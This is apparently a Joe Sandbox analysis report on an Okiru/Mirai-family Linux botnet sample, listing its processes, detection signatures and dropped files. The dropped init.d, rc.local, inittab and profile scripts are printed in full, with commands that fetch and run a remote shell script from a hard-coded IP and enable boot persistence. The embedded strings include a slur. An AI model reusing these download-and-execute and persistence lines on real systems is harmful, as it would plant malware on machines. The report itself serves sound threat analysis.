Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
m68k.nn.elf

Overview

General Information

Sample name:m68k.nn.elf
Analysis ID:1581263
MD5:8845ad8ddea06d04b98a1c8dc9c97c56
SHA1:fddc02400f6189995b491b6f74f0fe0a4e9dd05b
SHA256:233e8137b8c1b925ca40c6851777a8ddd4859a2ddbdf282d670b0a918be000e0
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1581263
Start date and time:2024-12-27 09:13:20 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 41s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:m68k.nn.elf
Detection:MAL
Classification:mal72.spre.troj.evad.linELF@0/10@2/0
  • VT rate limit hit for: http://94.156.227.229/
  • VT rate limit hit for: http://94.156.227.229/lol.sh
  • VT rate limit hit for: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
Command:/tmp/m68k.nn.elf
PID:5449
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • m68k.nn.elf (PID: 5449, Parent: 5373, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.nn.elf
    • sh (PID: 5472, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 5474, Parent: 5472)
      • systemctl (PID: 5474, Parent: 5472, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 5490, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 5496, Parent: 5490)
      • chmod (PID: 5496, Parent: 5490, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 5497, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 5499, Parent: 5497)
      • ln (PID: 5499, Parent: 5497, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 5500, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
    • sh (PID: 5502, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 5504, Parent: 5502)
      • chmod (PID: 5504, Parent: 5502, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/m68k.nn.elf
    • sh (PID: 5505, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 5507, Parent: 5505)
      • mkdir (PID: 5507, Parent: 5505, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 5508, Parent: 5449, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 5513, Parent: 5508)
      • ln (PID: 5513, Parent: 5508, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
  • udisksd New Fork (PID: 5461, Parent: 802)
  • dumpe2fs (PID: 5461, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 5488, Parent: 5487)
  • snapd-env-generator (PID: 5488, Parent: 5487, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 5545, Parent: 802)
  • dumpe2fs (PID: 5545, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
SourceRuleDescriptionAuthorStrings
m68k.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    SourceRuleDescriptionAuthorStrings
    5449.1.00007f48dc001000.00007f48dc018000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      Process Memory Space: m68k.nn.elf PID: 5449JoeSecurity_OkiruYara detected OkiruJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: m68k.nn.elfReversingLabs: Detection: 15%
        Source: m68k.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmalloc[start_pid_hopping] Failed to clone: %s
        Source: /tmp/m68k.nn.elf (PID: 5449)Socket: 0.0.0.0:38242Jump to behavior
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: m68k.nn.elfString found in binary or memory: http://94.156.227.229/
        Source: profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.30.dr, custom.service.12.drString found in binary or memory: http://94.156.227.229/lol.sh
        Source: m68k.nn.elfString found in binary or memory: http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/ud
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal72.spre.troj.evad.linELF@0/10@2/0

        Persistence and Installation Behavior

        barindex
        Source: /tmp/m68k.nn.elf (PID: 5449)File: /etc/profileJump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5449)File: /etc/rc.localJump to behavior
        Source: /usr/bin/ln (PID: 5499)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
        Source: /usr/bin/ln (PID: 5513)File: /etc/rc.d/S99m68k.nn.elf -> /etc/init.d/m68k.nn.elfJump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5449)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 5496)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 5504)File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5472)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5490)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5497)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5500)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5502)Shell command executed: sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5505)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5508)Shell command executed: sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /bin/sh (PID: 5496)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
        Source: /bin/sh (PID: 5504)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/m68k.nn.elfJump to behavior
        Source: /bin/sh (PID: 5507)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
        Source: /bin/sh (PID: 5474)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5449)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 5496)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 5504)File: /etc/init.d/m68k.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/m68k.nn.elf (PID: 5449)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
        Source: /tmp/m68k.nn.elf (PID: 5449)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
        Source: /bin/sh (PID: 5500)Writes shell script file to disk with an unusual file extension: /etc/init.d/m68k.nn.elfJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/m68k.nn.elf (PID: 5449)File: /etc/init.d/systemJump to dropped file
        Source: /bin/sh (PID: 5500)File: /etc/init.d/m68k.nn.elfJump to dropped file
        Source: /tmp/m68k.nn.elf (PID: 5449)Queries kernel information via 'uname': Jump to behavior
        Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k/usQ
        Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
        Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
        Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmpBinary or memory string: 5VeU5!/usr/bin/vmtoolsd
        Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmpBinary or memory string: /tmp/qemu-open.QnTq7b
        Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
        Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmpBinary or memory string: 4JReU/tmp/qemu-open.QnTq7b-]LReU
        Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmpBinary or memory string: 4VeU!/etc/qemu-binfmt/m68k
        Source: m68k.nn.elf, 5449.1.000055655634b000.00005565563d0000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
        Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmpBinary or memory string: _4x86_64/usr/bin/qemu-m68k/tmp/m68k.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.nn.elf
        Source: m68k.nn.elf, 5449.1.00007ffd2681b000.00007ffd2683c000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 5449.1.00007f48dc001000.00007f48dc018000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 5449, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: m68k.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 5449.1.00007f48dc001000.00007f48dc018000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: m68k.nn.elf PID: 5449, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Unix Shell Configuration Modification
        1
        Unix Shell Configuration Modification
        1
        Masquerading
        OS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Non-Application Layer Protocol
        Exfiltration Over Other Network Medium1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Systemd Service
        1
        Systemd Service
        2
        File and Directory Permissions Modification
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt2
        Scripting
        Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581263 Sample: m68k.nn.elf Startdate: 27/12/2024 Architecture: LINUX Score: 72 49 daisy.ubuntu.com 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected Okiru 2->53 8 m68k.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 systemd snapd-env-generator 2->16         started        signatures3 process4 file5 41 /etc/rc.local, POSIX 8->41 dropped 43 /etc/profile, ASCII 8->43 dropped 45 /etc/init.d/system, POSIX 8->45 dropped 55 Sample tries to set files in /etc globally writable 8->55 57 Sample tries to persist itself using /etc/profile 8->57 59 Drops files in suspicious directories 8->59 61 Sample tries to persist itself using System V runlevels 8->61 18 m68k.nn.elf sh 8->18         started        20 m68k.nn.elf sh 8->20         started        22 m68k.nn.elf sh 8->22         started        24 4 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        47 /etc/init.d/m68k.nn.elf, POSIX 24->47 dropped 63 Drops files in suspicious directories 24->63 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        signatures9 process10 signatures11 65 Sample tries to set files in /etc globally writable 28->65 67 Sample tries to persist itself using System V runlevels 31->67
        SourceDetectionScannerLabelLink
        m68k.nn.elf16%ReversingLabsLinux.Backdoor.Mirai
        SourceDetectionScannerLabelLink
        /etc/rc.local0%ReversingLabs
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s0%Avira URL Cloudsafe
        http://94.156.227.229/lol.sh100%Avira URL Cloudmalware
        http://94.156.227.229/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        162.213.35.24
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://94.156.227.229/m68k.nn.elffalse
          • Avira URL Cloud: safe
          unknown
          http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sm68k.nn.elffalse
          • Avira URL Cloud: safe
          unknown
          http://94.156.227.229/lol.shprofile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.30.dr, custom.service.12.drfalse
          • Avira URL Cloud: malware
          unknown
          No contacted IP infos
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          daisy.ubuntu.comdb0fa4b8db0333367e9bda3ab68b8042.arc.elfGet hashmaliciousGafgyt, MiraiBrowse
          • 162.213.35.24
          RpcSecurity.x86.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.24
          .i.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.24
          RpcSecurity.arm7.elfGet hashmaliciousMiraiBrowse
          • 162.213.35.25
          RpcSecurity.mpsl.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.25
          RpcSecurity.ppc.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.25
          RpcSecurity.arm.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.24
          RpcSecurity.spc.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.24
          RpcSecurity.mips.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.25
          RpcSecurity.m68k.elfGet hashmaliciousUnknownBrowse
          • 162.213.35.24
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          /etc/rc.localx86_64.nn.elfGet hashmaliciousOkiruBrowse
            x86_32.nn.elfGet hashmaliciousOkiruBrowse
              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                powerpc.nn.elfGet hashmaliciousOkiruBrowse
                  sparc.nn.elfGet hashmaliciousOkiruBrowse
                    arm7.nn-20241224-0652.elfGet hashmaliciousMirai, OkiruBrowse
                      arm.nn-20241224-0652.elfGet hashmaliciousOkiruBrowse
                        mips.nn.elfGet hashmaliciousOkiruBrowse
                          m68k.nn.elfGet hashmaliciousOkiruBrowse
                            arm5.nn.elfGet hashmaliciousOkiruBrowse
                              Process:/tmp/m68k.nn.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):126
                              Entropy (8bit):4.663487152693506
                              Encrypted:false
                              SSDEEP:3:KPJRXSC/ANFDDoCvLdjX43LbaaFOdFXa5O:WJRlufoYZX47baaeXCO
                              MD5:908A2B9113EF8A6A2CA4E9909AA60D79
                              SHA1:9E7FD1C2F22C6CEA305B379B5824B383E68602EB
                              SHA-256:1BA32EE3006E9EA178B34C8B1605409BF57F0DA9663E2C08EA36F86413C2E10C
                              SHA-512:9B80CD7CDB1BA13B53B9C9B254551103EBFDB907F4C18169F46880E8A1386B9BB5C70DC42CA7A239178B882EFDF037C3F21C02A4FD6E06DCBC7EB718BF5502F7
                              Malicious:false
                              Reputation:low
                              Preview:run bootcmd_mmc0; /tmp/m68k.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                              Process:/bin/sh
                              File Type:POSIX shell script, ASCII text executable
                              Category:dropped
                              Size (bytes):406
                              Entropy (8bit):4.606101554109645
                              Encrypted:false
                              SSDEEP:12:QRkiMEXNxl8GKUJgjvMHK2FSuKN+dRRucSOyd3:vRG1ISzhYOM3
                              MD5:EA049B21825DBB44516EE73049A785F0
                              SHA1:F8BEB8ECB7C2CE6F8E87A4D3C15184E5CF44D906
                              SHA-256:822A631C02D919ACBA742FB191641422016135DB9B6ECCBAD70771938C5EF3F3
                              SHA-512:0571E58FA1B11CCEEF99E7CDCB6A7BAB9EE570DC16C566BCE2D15FDA5E730C07677389C671764BE5DB5918985FFDDB8AA942990729692730BA9344EBF3BC7A30
                              Malicious:true
                              Reputation:low
                              Preview:#!/bin/sh.# /etc/init.d/m68k.nn.elf..case "" in. start). echo 'Starting m68k.nn.elf'. /tmp/m68k.nn.elf &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping m68k.nn.elf'. killall m68k.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                              Process:/tmp/m68k.nn.elf
                              File Type:POSIX shell script, ASCII text executable
                              Category:dropped
                              Size (bytes):113
                              Entropy (8bit):4.635913085165249
                              Encrypted:false
                              SSDEEP:3:TKH4vZKSC/ANFDvSDRFiLdjX43LpaKB0dFLoKE0:h8luzSXoZX47zBeLXE0
                              MD5:30F0DF9AABDD5B925A99BF84CA409F8F
                              SHA1:15A661E91E595D0B2731D962969D2D643EA115E2
                              SHA-256:B6ABB6C1A724BC805B1156C9540115733AB2DB2DAE61BCDD0EF1A8502F51283B
                              SHA-512:82F8DF62AA47B5E4EDFBBED25077FCCB24FF584EB05311AD6D90D28C09C90721A111700A59855FD7A54C513847DEA85039CCA03B8895B5969C60D5FEA913A491
                              Malicious:true
                              Reputation:low
                              Preview:#!/bin/sh./tmp/m68k.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                              Process:/tmp/m68k.nn.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):118
                              Entropy (8bit):4.598017743761046
                              Encrypted:false
                              SSDEEP:3:nAWu58C/ANFDDoCvLdjX43LbaaFOdFXa5O:ANufoYZX47baaeXCO
                              MD5:74886B7A12D12F572970E2E377DB92E8
                              SHA1:B85983EB18C1572CE93C473BE48A4634181D221C
                              SHA-256:1D5454DA4E60D3C773591F209004A054AED5299C9D788E8F3457B73C8181A8D5
                              SHA-512:1951E7625257C5367CAAA172CA580E36670EAAB9C78AFC2CB89B2FBB9EE23B9FFC6DED2529DE89EE284A414238F5B262CDF3EFB77659750800522C02F9236AAD
                              Malicious:false
                              Reputation:low
                              Preview:::respawn:/tmp/m68k.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                              Process:/tmp/m68k.nn.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):53
                              Entropy (8bit):3.871459242626451
                              Encrypted:false
                              SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                              MD5:2BD9B4BE30579E633FC0191AA93DF486
                              SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                              SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                              SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:gorilla botnet is on the device ur not a cat go away.
                              Process:/tmp/m68k.nn.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):109
                              Entropy (8bit):4.487760140811423
                              Encrypted:false
                              SSDEEP:3:TgSC/ANFDvSDRFiLdjX43LbaaFOdFXa50:TgluzSXoZX47baaeXC0
                              MD5:66B7DB5343FB9087227AEF4DDEA5ED09
                              SHA1:6462EB789FBFB1C54DE9B5BC790512CB64C29738
                              SHA-256:619BB214971CD309CBCFB7D3EC0C2425BA438C6D29D9CB9212639D3B549C9A1D
                              SHA-512:38F2E1C9F30BB7A0FFBEC3FDB226FAAB01CFE3FEAB0C32F8825CE0E80A767E7BB14D840EE1AE529D3394C0477D99811EEE1AD74CE3A897987E892570FA595524
                              Malicious:true
                              Reputation:low
                              Preview:/tmp/m68k.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                              Process:/tmp/m68k.nn.elf
                              File Type:POSIX shell script, ASCII text executable
                              Category:dropped
                              Size (bytes):10
                              Entropy (8bit):3.121928094887362
                              Encrypted:false
                              SSDEEP:3:TKH4vn:hv
                              MD5:3E2B31C72181B87149FF995E7202C0E3
                              SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                              SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                              SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: x86_64.nn.elf, Detection: malicious, Browse
                              • Filename: x86_32.nn.elf, Detection: malicious, Browse
                              • Filename: mipsel.nn.elf, Detection: malicious, Browse
                              • Filename: powerpc.nn.elf, Detection: malicious, Browse
                              • Filename: sparc.nn.elf, Detection: malicious, Browse
                              • Filename: arm7.nn-20241224-0652.elf, Detection: malicious, Browse
                              • Filename: arm.nn-20241224-0652.elf, Detection: malicious, Browse
                              • Filename: mips.nn.elf, Detection: malicious, Browse
                              • Filename: m68k.nn.elf, Detection: malicious, Browse
                              • Filename: arm5.nn.elf, Detection: malicious, Browse
                              Reputation:moderate, very likely benign file
                              Preview:#!/bin/sh.
                              Process:/tmp/m68k.nn.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):307
